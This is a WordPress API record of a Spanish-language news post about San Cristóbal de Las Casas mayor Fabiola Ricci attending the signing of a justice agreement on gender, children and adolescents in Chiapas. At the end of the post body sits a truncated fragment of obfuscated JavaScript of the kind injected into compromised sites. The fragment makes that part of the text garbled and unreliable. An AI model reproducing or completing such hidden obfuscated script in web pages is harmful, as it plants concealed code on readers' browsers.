{"id":23537,"date":"2025-08-19T03:07:44","date_gmt":"2025-08-19T03:07:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23537"},"modified":"2025-08-19T03:07:45","modified_gmt":"2025-08-19T03:07:45","slug":"asiste-fabiola-ricci-a-la-firma-de-acuerdo-por-una-justicia-con-perspectiva-de-genero-nineces-y-adolescencias-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23537","title":{"rendered":"Asiste Fabiola Ricci a la firma de Acuerdo por una Justicia con Perspectiva de G\u00e9nero, Ni\u00f1eces y Adolescencias en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"698\" height=\"1024\" data-id=\"23538\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285439-698x1024.jpg\" alt=\"\" class=\"wp-image-23538\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285439-698x1024.jpg 698w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285439-204x300.jpg 204w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285439-768x1127.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285439.jpg 810w\" sizes=\"auto, (max-width: 698px) 100vw, 698px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"787\" height=\"1024\" data-id=\"23539\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285442-787x1024.jpg\" alt=\"\" class=\"wp-image-23539\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285442-787x1024.jpg 787w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285442-231x300.jpg 231w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285442-768x999.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285442.jpg 810w\" sizes=\"auto, (max-width: 787px) 100vw, 787px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"810\" height=\"1006\" data-id=\"23540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285445.jpg\" alt=\"\" class=\"wp-image-23540\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285445.jpg 810w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285445-242x300.jpg 242w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000285445-768x954.jpg 768w\" sizes=\"auto, (max-width: 810px) 100vw, 810px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 18 de agosto de 2025.- A invitaci\u00f3n del Tribunal de Justicia del Estado de Chiapas, la presidenta municipal de San Crist\u00f3bal de Las Casas, Mtra. Fabiola Ricci Diestel, asisti\u00f3 a la firma de un acuerdo hist\u00f3rico promovido por la Suprema Corte de Justicia de la Naci\u00f3n y la Colectiva 50+1 Chiapas, acompa\u00f1ada de juzgadoras y juzgadores federales electos.<\/p>\n\n\n\n<p>En el evento estuvieron presentes como testigos la ministra Yazm\u00edn Esquivel Mossa, el magistrado Ar\u00edstides Rodrigo Guerrero Garc\u00eda, el magistrado presidente Guillermo Valls Esponda, el presidente del Poder Judicial de Chiapas Juan Carlos Moreno Guill\u00e9n, as\u00ed como el gobernador Eduardo Ram\u00edrez Aguilar y su esposa Sof\u00eda Espinosa.<\/p>\n\n\n\n<p>El acuerdo representa un compromiso firme para fortalecer una justicia humanista, incluyente y culturalmente pertinente, y garantizar los derechos de mujeres, ni\u00f1as, ni\u00f1os y adolescentes. La presidenta municipal destac\u00f3 que desde San Crist\u00f3bal de Las Casas se suman con convicci\u00f3n a este esfuerzo, trabajando por un Chiapas m\u00e1s justo, seguro y digno para todas y todos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 18 de agosto de 2025.- A invitaci\u00f3n del Tribunal de Justicia del Estado de Chiapas, la presidenta municipal de San Crist\u00f3bal de Las Casas, Mtra. Fabiola Ricci Diestel, asisti\u00f3 a la firma de un acuerdo hist\u00f3rico promovido por la Suprema Corte de Justicia de la Naci\u00f3n y la Colectiva &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23539,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23537","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23537","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23537"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23537\/revisions"}],"predecessor-version":[{"id":23541,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23537\/revisions\/23541"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23539"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23537"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23537"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23537"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}